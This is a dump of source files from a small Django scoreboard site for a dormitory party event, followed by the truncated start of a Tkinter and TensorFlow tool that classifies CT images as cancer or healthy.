"a272ba7782938bc466a60f5acb2091e070a0219c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 114, "num_lines": 37, "path": "/marbar/management/migrations/0001_initial.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.1 on 2018-10-26 15:02\n\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n 
('title', models.CharField(default='', max_length=200)),\n ('info', models.TextField(default='', max_length=200)),\n ('start_date', models.DateTimeField(auto_now_add=True)),\n ('end_date', models.DateTimeField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='MarBar',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(default='', max_length=200)),\n ('banner', models.ImageField(blank=True, upload_to='banners/', verbose_name='banner')),\n ('end_date', models.DateTimeField()),\n ('is_active', models.BooleanField(default=False)),\n ('user', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5371794700622559, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 25.89655113220215, "blob_id": "e1f9c2f3a1b095de5118431598859e3eb80874fe", "content_id": "e2b590b00d4589fd2d203317950d730d6d551c0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 780, "license_type": "no_license", "max_line_length": 119, "num_lines": 29, "path": "/marbar/management/migrations/0003_auto_20190215_1354.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-02-15 13:54\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('management', '0002_auto_20190131_1745'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='event',\n name='marbar',\n field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='management.MarBar'),\n ),\n migrations.AlterField(\n model_name='event',\n name='end_date',\n field=models.DateTimeField(),\n ),\n migrations.AlterField(\n model_name='event',\n name='start_date',\n field=models.DateTimeField(),\n ),\n ]\n" }, { "alpha_fraction": 0.8202247023582458, "alphanum_fraction": 0.8202247023582458, "avg_line_length": 17, "blob_id": "002e3956d55be865c8ce547f5566b4507499f26e", "content_id": "7e9ae0b132a3af3f3b1b6f7132f06a2801db7fce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 32, "num_lines": 5, "path": "/marbar/management/admin.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import MarBar\n\n\nadmin.site.register(MarBar)" }, { "alpha_fraction": 0.4175538718700409, "alphanum_fraction": 0.4310568571090698, "avg_line_length": 35.8516731262207, "blob_id": "c5714420a62a6f733e378f767283829dffb34b97", "content_id": "4183976836b9ab9617b5f0e0844b8eb7ad00aceb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 7702, "license_type": "no_license", "max_line_length": 114, "num_lines": 209, "path": "/marbar/score_board/templates/score_board.html", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "{% extends \"base.html\" %}\n\n{% load static %}\n\n{% block headers %}\n\n\n <script type=\"text/javascript\" src=\"{% static \"jqplot/jquery.jqplot.js\" %}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.barRenderer.js\" %}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.categoryAxisRenderer.js\" %}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.canvasAxisLabelRenderer.js\" 
%}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.canvasAxisTickRenderer.js\" %}\"></script>\n <script type=\"text/javascript\" src=\"{% static \"jqplot/plugins/jqplot.pointLabels.js\" %}\"></script>\n <link rel=\"stylesheet\" type=\"text/css\" href=\"{% static \"jqplot/jquery.jqplot.css\" %}\" />\n <link rel=\"stylesheet\" type=\"text/css\" href=\"{% static \"scoreboard_style.css\" %}\" />\n\n{% endblock %}\n\n{% block content %}\n\n <div class=\"outer_layer\">\n <div class=\"column\" id=\"col_1\">\n {% if collum_1 %}\n <ul class=\"column_element\">\n {% for participant in collum_1 %}\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n {% endfor %}\n </ul>\n {% else %}\n <p>No polls are available.</p>\n {% endif %}\n </div>\n\n <div class=\"column\">\n <div class=\"col-sm-1\" id=\"col_2\">\n {% if collum_2 %}\n <ul class=\"column_element\">\n {% for participant in collum_2 %}\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n {% endfor %}\n </ul>\n {% else %}\n <p>No polls are available.</p>\n {% endif %}\n </div>\n </div>\n\n <div id=\"middle_section\">\n <div id=\"banner_outer\">\n <img src=\"{% static \"media/banners/test_image.png\" %}\" alt=\"my image\" id=\"banner_inner\">\n </div>\n <div>\n <h1 id=\"countdownClock\"></h1>\n </div>\n <div id=\"mainGraph\">\n </div>\n\n\n {% if collum_0 %}\n <div id=\"col_0_id\">\n <ul>\n {% for participant in collum_0 %}\n <div class=\"column_element col_0_class\">\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n </div>\n {% endfor %}\n </ul>\n </div>\n {% else %}\n <div class=\"col-sm-4\">\n <p>No polls are available.</p>\n </div>\n {% endif %}\n </div>\n\n <div class=\"column\" id=\"col_3\">\n {% if collum_3 %}\n <ul class=\"column_element\">\n {% for participant in collum_3 %}\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n {% endfor %}\n </ul>\n {% else %}\n <p>No polls are available.</p>\n {% endif %}\n </div>\n\n <div class=\"column\" id=\"col_4\">\n {% if collum_4 %}\n <ul class=\"column_element\">\n {% for participant in collum_4 %}\n <h3>{{ participant.title }}</h3>\n <p id=\"{{ participant.title }}\">{{ participant.points }}</p>\n {% endfor %}\n </ul>\n {% else %}\n <p>No polls are available.</p>\n {% endif %}\n </div>\n\n </div>\n\n <script id=\"source\" language=\"javascript\" type=\"text/javascript\">\n $.ajaxSetup({cache: false});\n $( document ).ready(function() {\n update_score();\n update_plot();\n countdownClock();\n $.ajaxSetup({ cache: true });\n });\n\n function update_score() {\n $.ajax({\n url: \"{% url 'score_board:get_points' %}\",\n data: \"\",\n dataType: 'json',\n success: function(res_var) {\n res_var.forEach(function(res_item) {\n document.getElementById(res_item[\"title\"]).innerHTML = res_item[\"points\"];\n }\n );\n }\n }\n );\n }\n setInterval(update_score, 500);\n\n function update_plot() {\n $.ajax({\n url: \"{% url 'score_board:get_graph' %}\",\n data: \"\",\n dataType: 'json',\n success: function(res_var) {\n var s1 = JSON.parse(res_var.points);\n //var ticks = JSON.parse(res_var.graph_labels);\n\n $.jqplot.config.enablePlugins = true;\n\n\n plot1 = $.jqplot('mainGraph', [s1], {\n series:[{renderer:$.jqplot.BarRenderer}],\n axes: {\n xaxis: {\n renderer: $.jqplot.CategoryAxisRenderer,\n label: 'Warranty Concern',\n labelRenderer: $.jqplot.CanvasAxisLabelRenderer,\n 
tickRenderer: $.jqplot.CanvasAxisTickRenderer,\n tickOptions: {\n angle: -30,\n fontFamily: 'Courier New',\n fontSize: '9pt'\n }\n\n },\n yaxis: {\n label: 'Occurance',\n labelRenderer: $.jqplot.CanvasAxisLabelRenderer\n }\n }\n });\n }\n }\n );\n }\n setInterval(update_plot, 50000);\n\n function countdownClock() {\n // from: https://www.w3schools.com/howto/howto_js_countdown.asp\n\n var countDownDate = new Date(\"{{ countdown_date.year }}\", \"{{ countdown_date.month }}\" -1,\n \"{{ countdown_date.day }}\", \"{{ countdown_date.hour }}\", \"{{ countdown_date.minute }}\",\n \"{{ countdown_date.second }}\");\n\n // Update the count down every 1 second\n var x = setInterval(function() {\n\n // Get todays date and time\n var now = new Date().getTime();\n\n // Find the distance between now and the count down date\n var distance = countDownDate - now;\n\n // Time calculations for days, hours, minutes and seconds\n var days = Math.floor(distance / (1000 * 60 * 60 * 24));\n var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));\n var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));\n var seconds = Math.floor((distance % (1000 * 60)) / 1000);\n\n // Display the result in the element with id=\"demo\"\n document.getElementById(\"countdownClock\").innerHTML = days + \"d \" + hours + \"h \"\n + minutes + \"m \" + seconds + \"s \";\n\n // If the count down is finished, write some text\n if (distance < 0) {\n clearInterval(x);\n document.getElementById(\"countdownClock\").innerHTML = \"Too Easy!\";\n }\n }, 1000);\n }\n\n\n\n </script>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.7890700101852417, "alphanum_fraction": 0.7890700101852417, "avg_line_length": 48.66666793823242, "blob_id": "2434d1525b37b30cdb064181c30cce485f59be82", "content_id": "56d2ce2a53e5bf55892cb0780eaafefedc21a37e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 141, "num_lines": 21, "path": "/README.md", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# marbar\nPoint system for MarBar (dormitory party thing)\nA lot of polishing is still needed for this site\n\n\nA simple site for keeping track of points\n\nThe front page features scores for the active \"marbar\" along with a graph of the points and a time tracker of how long the \"marbar\" has left.\nThe management site allows a superuser to add new users as well as create new marbars (only one can be active at any time).\nThe event page features events connected to the active marbar.\nThe add_points page is for adding points to the units connected to the active marbar.\n\nA user can be either a superuser (unlimited access to everything) or a normal user (created by a superuser, \nwho can manage and assign events and points to the marbars it is connected to).\nNo login is required for the front page and the event page.\n\n\nToDo:\nThe graph is not working when trying to employ the \"tick\" rendering options of \"jqplot\"\nThe picture for the front page needs to be able to be changed from the management page\nThe styling of the page obviously needs a lot of work\n" }, { "alpha_fraction": 0.682170569896698, "alphanum_fraction": 0.682170569896698, "avg_line_length": 27.77777862548828, "blob_id": "c947f32ecc7594feb3aae692b329c789b81b5aba", "content_id": "abd23975f539f6ed827ade903118dca971b01d46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 258, "license_type":
"no_license", "max_line_length": 70, "num_lines": 9, "path": "/marbar/score_board/urls.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('get_points', views.get_points, name='get_points'),\n path('get_graph', views.get_graph, name='get_graph'),\n path('assign_points/', views.assign_points, name='assign_points'),\n]" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.7071005702018738, "avg_line_length": 29.727272033691406, "blob_id": "d0426956430cd6a4c8f0332981703380873180d0", "content_id": "a82d1c69d5e4673c4df75b8f04c1d2b81b4389c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 77, "num_lines": 11, "path": "/marbar/score_board/models.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass ScoreUnit(models.Model):\n title = models.CharField(max_length=200, default=\"\")\n points = models.IntegerField(default=0)\n placement = models.IntegerField(default=0)\n marbar = models.ForeignKey('management.MarBar', on_delete=models.CASCADE)\n\n def __str__(self):\n return self.title\n" }, { "alpha_fraction": 0.6712802648544312, "alphanum_fraction": 0.6816608905792236, "avg_line_length": 33.68000030517578, "blob_id": "660837ba8f7a567898463dfca1ea0bfa3fd1da9e", "content_id": "ac9550a2b7cecc1a7ca8ecb88d286e7ea4aafb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 78, "num_lines": 25, "path": "/marbar/management/models.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass MarBar(models.Model):\n title = models.CharField(max_length=200, default=\"\", unique=True)\n banner = models.ImageField(upload_to='banners/',\n verbose_name='banner', blank=True)\n users = models.ManyToManyField(User)\n end_date = models.DateTimeField(blank=False)\n is_active = models.BooleanField(default=False, blank=False)\n\n def __str__(self):\n return self.title\n\n\nclass Event(models.Model):\n marbar = models.ForeignKey(MarBar, on_delete=models.CASCADE, default=None)\n title = models.CharField(max_length=200, default=\"\")\n info = models.TextField(max_length=200, default=\"\")\n start_date = models.DateTimeField(blank=False)\n end_date = models.DateTimeField(blank=False)\n\n def __str__(self):\n return self.title\n" }, { "alpha_fraction": 0.5092936754226685, "alphanum_fraction": 0.5501858592033386, "avg_line_length": 22.39130401611328, "blob_id": "0f72087ac9b16051be2a3e0c86fcab87de93ed6e", "content_id": "6d274cc586a1b6b5e84117f8c671fb68b1f3561d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 538, "license_type": "no_license", "max_line_length": 76, "num_lines": 23, "path": "/marbar/management/migrations/0002_auto_20190131_1745.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-01-31 17:45\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('management', '0001_initial'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='marbar',\n old_name='user',\n new_name='users',\n ),\n migrations.AlterField(\n model_name='marbar',\n name='title',\n 
field=models.CharField(default='', max_length=200, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 13, "blob_id": "7308605249e938385da9d8e8d5c45ddd2fdf4b78", "content_id": "2d9bfc1049cdee3bcb395682977b79d7571e40a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 28, "license_type": "no_license", "max_line_length": 13, "num_lines": 2, "path": "/requirements.txt", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "django>=2.1.5\nPillow==5.3.0\n" }, { "alpha_fraction": 0.6357301473617554, "alphanum_fraction": 0.6359321475028992, "avg_line_length": 46.83091735839844, "blob_id": "52c9f9a539a65eea7e67ac33b89cf2adfc71af47", "content_id": "d687f11764c28c5acae48e0df79471b71fd7fa25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9902, "license_type": "no_license", "max_line_length": 120, "num_lines": 207, "path": "/marbar/management/views.py", "repo_name": "fumpen/marbar", "src_encoding": "UTF-8", "text": "from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom .models import MarBar, Event\nfrom .forms import MarBarForm, EventForm\nfrom score_board.models import ScoreUnit\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import transaction\n\n\ndef general_management(request):\n if not request.user.is_authenticated:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n else:\n response_context = {}\n if request.user.is_superuser:\n response_context['superuser'] = True\n response_context['createUser'] = UserCreationForm\n\n marbar_form = MarBarForm()\n response_context['createMarBar'] = marbar_form\n marbars = MarBar.objects.all()\n else:\n response_context['superuser'] = False\n marbars = MarBar.objects.filter(users__in=[request.user])\n\n t = [{'title': m.title, 'pk': m.pk,\n 'form': MarBarForm({'title': m.title, 'users': m.users, 'end_date': m.end_date, 'intended_pk': m.pk})}\n for m in marbars]\n\n response_context['manageMarbars'] = t\n return render(request, 'manage_marbar.html', response_context)\n\n\n\ndef crude_login_view(request):\n return render(request, \"login.html\")\n\n\ndef crude_login(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR, 'Either username or password were incorrect')\n return redirect(reverse('management:login_view'))\n\n\ndef logout_user(request):\n logout(request)\n return redirect(reverse('score_board'))\n\n\ndef create_marbar(request):\n if not request.user.is_authenticated & request.user.is_superuser:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n if request.method == 'POST':\n form = MarBarForm(request.POST, request.FILES)\n if form.is_valid():\n form.save(new_instance=True)\n messages.add_message(request, messages.INFO, 'MarBar was successfully created')\n return 
redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.WARNING, \"Please recheck that the form is filled as intended\")\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR,\n \"You have beers to drink and records to break, Stop playing around\")\n return redirect(reverse('management:management_view'))\n\n\ndef create_user(request):\n if not request.user.is_authenticated & request.user.is_superuser:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n messages.add_message(request, messages.INFO, 'User was successfully created')\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.WARNING, \"The user input did not fulfill with the requirements\")\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR,\n \"You have beers to drink and records to break, Stop playing around\")\n return redirect(reverse('management:management_view'))\n\n\ndef update_marbar(request):\n if not request.user.is_authenticated:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n if request.method == 'POST':\n form = MarBarForm(request.POST, request.FILES)\n if form.is_valid():\n form.save(new_instance=False, update_instance=True)\n messages.add_message(request, messages.INFO, 'MarBar was successfully updated')\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.WARNING, \"Please recheck that the form is filled as intended\")\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR,\n \"You have beers to drink and records to break, Stop playing around\")\n return redirect(reverse('management:management_view'))\n\n\ndef activate_marbar(request):\n if not request.user.is_authenticated & request.user.is_superuser:\n messages.add_message(request, messages.INFO, 'plz log in to access this site')\n return redirect(reverse('management:login_view'))\n if request.method == 'POST':\n if 'activateMarBar' in request.POST:\n activation_pk = int(request.POST.get('activateMarBar'))\n try:\n m = MarBar.objects.get(pk=activation_pk)\n if not m.is_active:\n with transaction.atomic():\n if MarBar.objects.filter(is_active=True).exists():\n old_active = MarBar.objects.get(is_active=True)\n old_active.is_active = False\n old_active.save()\n m.is_active = True\n m.save()\n messages.add_message(request, messages.INFO, '{} is now the active MarBar'.format(m.title))\n else:\n messages.add_message(request, messages.INFO, 'This MarBar is already active')\n except ObjectDoesNotExist:\n messages.add_message(request, messages.WARNING, 'An error occurred, please try again')\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.WARNING, \"Refresh the page or contact someone that has coded this\")\n return redirect(reverse('management:management_view'))\n else:\n messages.add_message(request, messages.ERROR,\n \"You have beers to drink and records to break, Stop playing around\")\n return redirect(reverse('management:management_view'))\n\n\ndef events_view(request):\n active_bar = MarBar.objects.filter(is_active=True)\n 
if active_bar.exists() and active_bar.count() == 1:\n active_bar = MarBar.objects.get(is_active=True)\n if request.method == 'GET':\n response_context = {}\n events = Event.objects.filter(marbar=active_bar).order_by('start_date')\n if events.exists():\n response_context = {'current_events': [e for e in events]}\n\n if request.user.is_authenticated and (request.user in active_bar.users.all() or request.user.is_superuser):\n response_context['event_form'] = EventForm()\n return render(request, 'events.html', response_context)\n\n elif request.method == 'POST':\n if request.user.is_authenticated and (request.user in active_bar.users.all() or request.user.is_superuser):\n new_event = EventForm(request.POST)\n if new_event.is_valid():\n new_event.save(active_marbar=active_bar)\n messages.add_message(request, messages.INFO, 'Event was successfully created')\n return redirect(reverse('management:events'))\n else:\n messages.add_message(request, messages.WARNING, 'Please recheck the information filled in the form')\n return redirect(reverse('management:events'))\n else:\n messages.add_message(request, messages.WARNING, 'Please log in again to access this functionality')\n return redirect(reverse('management:login_view'))\n\n else:\n return redirect(reverse('score_board'))\n else:\n messages.add_message(request, messages.ERROR, 'There is currently no active MarBar')\n return redirect(reverse('score_board'))\n\n\ndef delete_event(request):\n active_bar = MarBar.objects.filter(is_active=True)\n\n if active_bar.exists() and active_bar.count() == 1:\n active_bar = MarBar.objects.get(is_active=True)\n if request.user.is_authenticated and (request.user in active_bar.users.all() or request.user.is_superuser):\n if request.method == 'POST':\n try:\n e = Event.objects.get(pk=int(request.POST.get('event_pk')), marbar=active_bar)\n e.delete()\n messages.add_message(request, messages.INFO, 'The event was deleted')\n return redirect(reverse('management:events'))\n except:\n messages.add_message(request, messages.ERROR, 'Refresh the page and try again')\n return redirect(reverse('management:events'))\n else:\n messages.add_message(request, messages.ERROR, 'Stop fooling around!')\n return redirect(reverse('management:events'))\n else:\n messages.add_message(request, messages.INFO, 'plz log in to access this functionality')\n return redirect(reverse('management:login_view'))\n messages.add_message(request, messages.ERROR, 'There is currently no active MarBar')\n return redirect(reverse('score_board'))\n\n" } ]
17
badalraina31/DeepCT
https://github.com/badalraina31/DeepCT
c2e5719bb3bdec9aacb2214b4960b13ed9f9d37d
2af5b42ca79d3b42ffdc21877ee57097a19b2913
2549a1f0fa59f858f7b2f06c215223a862126a8f
refs/heads/master
2022-04-16T05:39:31.582987
2020-03-14T16:42:16
2020-03-14T16:42:16
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6355921030044556, "alphanum_fraction": 0.6435486078262329, "avg_line_length": 33.35763168334961, "blob_id": "aaa1efb623372150a3fb155a599b4512a15106fd", "content_id": "f283da649f809cb246c5e8e8c192eb36aae56958", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15082, "license_type": "permissive", "max_line_length": 163, "num_lines": 439, "path": "/DeepCT.py", "repo_name": "badalraina31/DeepCT", "src_encoding": "UTF-8", "text": "# Tkinter import\nfrom tkinter import *\nfrom tkinter import filedialog # Needed for Pyinstaller to work\n\n# TensorFlow import\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.image import load_img\nfrom tensorflow.keras.preprocessing.image import img_to_array\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Convolution2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Dense\n\n# Helper libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport pydicom\nimport os\nimport PIL\n\n# Window\nmain = Tk()\nmain.title('DeepCT')\n\n# Variables for status of image and model\nis_image = False\nis_model = False\nglobal model_from_upload # Whether the model was uploaded or created\nmodel_from_upload = True\n\n# Check status of whether there are images\nglobal image_status_text\nimage_status_text = StringVar(main)\n\ndef check_image_status():\n\n if (is_image == False):\n image_status_text.set(\"Uploaded Image: False\")\n else:\n image_status_text.set(\"Uploaded Image: True\")\n\n# Check status of whether there is an uploaded model\nglobal model_status_text\nmodel_status_text = StringVar(main)\n\ndef check_model_status():\n\n if (is_model == False):\n model_status_text.set(\"Uploaded Model: False\")\n else:\n model_status_text.set(\"Uploaded Model: True\")\n\n# Upload DICOM image\ndef upload_image():\n\n # Upload the DICOM\n global import_image_filename\n import_image_filename = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"DICOM Image\",\"*.dcm\"),(\"all files\",\"*.*\")))\n\n # Set image uploaded to true\n global is_image\n is_image = True\n\n # Convert the dicom into .png\n try:\n ImageFile = pydicom.dcmread(import_image_filename)\n plt.imsave(str(import_image_filename + \".png\"), ImageFile.pixel_array, cmap=plt.cm.gray, vmin=1, vmax=2500)\n except FileNotFoundError:\n is_image = False # In case no file is uploaded\n\n # Update image status\n check_image_status()\n\n# Upload trained model\ndef upload_model():\n\n # Upload the model\n global import_model_filename\n import_model_filename = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"ML Model (.h5)\",\"*.h5\"),(\"all files\",\"*.*\")))\n\n # Set model to true\n global is_model\n is_model = True\n\n check_model_status()\n\n# Load and prepare the uploaded image\ndef load_image(filename):\n # Load the image\n img = load_img(filename, target_size=(150, 150))\n # Convert to array\n img = img_to_array(img)\n # Reshape into a single sample with 3 channels\n img = img.reshape(1, 150, 150, 3)\n # Center pixel data\n img = img.astype(\"float32\")\n return img\n\n# Load an image and predict its class\ndef run_program():\n # Load the image\n img = 
load_image(import_image_filename + \".png\")\n \n global model_filename\n\n # Load the model\n if(model_from_upload == False):\n model_filename = \"generated_model.h5\"\n else:\n model_filename = import_model_filename\n\n model = load_model(model_filename)\n\n # Predict the class\n result = model.predict(img)\n result_val = result[0]\n\n # Initialize result text variable\n global result_text\n # Print result based on numeric value\n if (result_val == 0):\n result_text = \"Cancer\"\n else:\n result_text = \"Healthy\"\n\n# Display the value in Entry box\ndef display_result():\n # Run the program while catching 1. No Image/Model uploaded 2. model uploaded not a .h5 file\n try:\n run_program()\n blank.delete(0, 'end')\n blank.insert(0, result_text)\n except NameError:\n messagebox.showerror(\"Error\", \"No Image/Model uploaded. Please try again.\")\n except OSError:\n messagebox.showerror(\"Error\", \"Model Not .h5. Please import another model or create one.\")\n\ndef open_healthy_train_dir():\n global healthy_train_dir_path\n healthy_train_dir_path = filedialog.askdirectory()\n print(healthy_train_dir_path)\n\ndef open_cancer_validate_dir():\n global cancer_validate_dir_path\n cancer_validate_dir_path = filedialog.askdirectory()\n print(cancer_validate_dir_path)\n\ndef open_healthy_validate_dir():\n global healthy_validate_dir_path\n healthy_validate_dir_path = filedialog.askdirectory()\n print(healthy_validate_dir_path)\n\n# Create a new window for training\ndef create_train_window():\n train_window = Toplevel(main)\n train_window.title(\"Train a Model\")\n\n # Variables for existence of directories\n cancer_train_dir_exist = False\n healthy_train_dir_exist = False\n cancer_validate_dir_exist = False\n healthy_validate_dir_exist = False\n\n # Cancer Training Directory\n global cancer_train_dir_text\n cancer_train_dir_text = StringVar(train_window)\n\n def check_cancer_train_dir_status():\n\n if(cancer_train_dir_exist == False):\n cancer_train_dir_text.set(\"Cancer Training Directory: False\")\n else:\n cancer_train_dir_text.set(\"Cancer Training Directory: True\")\n\n\n def open_cancer_train_dir():\n global cancer_train_dir_path\n cancer_train_dir_path = filedialog.askdirectory()\n\n nonlocal cancer_train_dir_exist\n cancer_train_dir_exist = True\n\n check_cancer_train_dir_status()\n\n check_cancer_train_dir_status()\n\n Label(train_window, textvariable = cancer_train_dir_text).grid(row=0)\n Button(train_window, text=\"Select\", command=open_cancer_train_dir).grid(row=0, column=1)\n\n # Healthy Training Directory\n global healthy_train_dir_text\n healthy_train_dir_text = StringVar(train_window)\n\n def check_healthy_train_dir_status():\n\n if(healthy_train_dir_exist == False):\n healthy_train_dir_text.set(\"Healthy Training Directory: False\")\n else:\n healthy_train_dir_text.set(\"Healthy Training Directory: True\")\n\n def open_healthy_train_dir():\n global healthy_train_dir_path\n healthy_train_dir_path = filedialog.askdirectory()\n\n nonlocal healthy_train_dir_exist\n healthy_train_dir_exist = True\n\n check_healthy_train_dir_status()\n\n check_healthy_train_dir_status()\n\n Label(train_window, textvariable = healthy_train_dir_text).grid(row=1)\n Button(train_window, text=\"Select\", command=open_healthy_train_dir).grid(row=1, column=1)\n\n # Cancer Validation Directory\n global cancer_validate_dir_text\n cancer_validate_dir_text = StringVar(train_window)\n\n def check_cancer_validate_dir_status():\n\n if(cancer_validate_dir_exist == False):\n cancer_validate_dir_text.set(\"Cancer 
Validation Directory: False\")\n else:\n cancer_validate_dir_text.set(\"Cancer Validation Directory: True\")\n\n def open_cancer_validate_dir():\n global cancer_validate_dir_path\n cancer_validate_dir_path = filedialog.askdirectory()\n\n nonlocal cancer_validate_dir_exist\n cancer_validate_dir_exist = True\n\n check_cancer_validate_dir_status()\n\n check_cancer_validate_dir_status()\n\n Label(train_window, textvariable = cancer_validate_dir_text).grid(row=2)\n Button(train_window, text=\"Select\", command=open_cancer_validate_dir).grid(row=2, column=1)\n\n # Healthy Validation Directory\n global healthy_validate_dir_text\n healthy_validate_dir_text = StringVar(train_window)\n\n def check_healthy_validate_dir_status():\n\n if(healthy_validate_dir_exist == False):\n healthy_validate_dir_text.set(\"Healthy Validation Directory: False\")\n else:\n healthy_validate_dir_text.set(\"Healthy Validation Directory: True\")\n\n def open_healthy_validate_dir():\n global healthy_validate_dir_path\n healthy_validate_dir_path = filedialog.askdirectory()\n\n nonlocal healthy_validate_dir_exist\n healthy_validate_dir_exist = True\n\n check_healthy_validate_dir_status()\n\n check_healthy_validate_dir_status()\n\n Label(train_window, textvariable = healthy_validate_dir_text).grid(row=3)\n Button(train_window, text=\"Select\", command=open_healthy_validate_dir).grid(row=3, column=1)\n\n # ML model variables\n global num_epochs\n target_size = 150\n\n Label(train_window, text=\"Number of Epochs:\").grid(row=4)\n num_epochs_entry = Entry(train_window)\n num_epochs_entry.grid(row=4, column=1) # So that .get() works and does not select .grid()\n\n def create_model():\n\n # Catches number of epochs being zero or a decimal\n try:\n num_epochs = int(num_epochs_entry.get())\n except ValueError:\n messagebox.showerror(\"Error\", \"Number of epochs cannot be zero and must be a whole number.\")\n\n # Catches number of epochs being less than one\n try: \n if (num_epochs < 1):\n messagebox.showerror(\"Error\", \"Number of epochs cannot be less than one.\")\n except 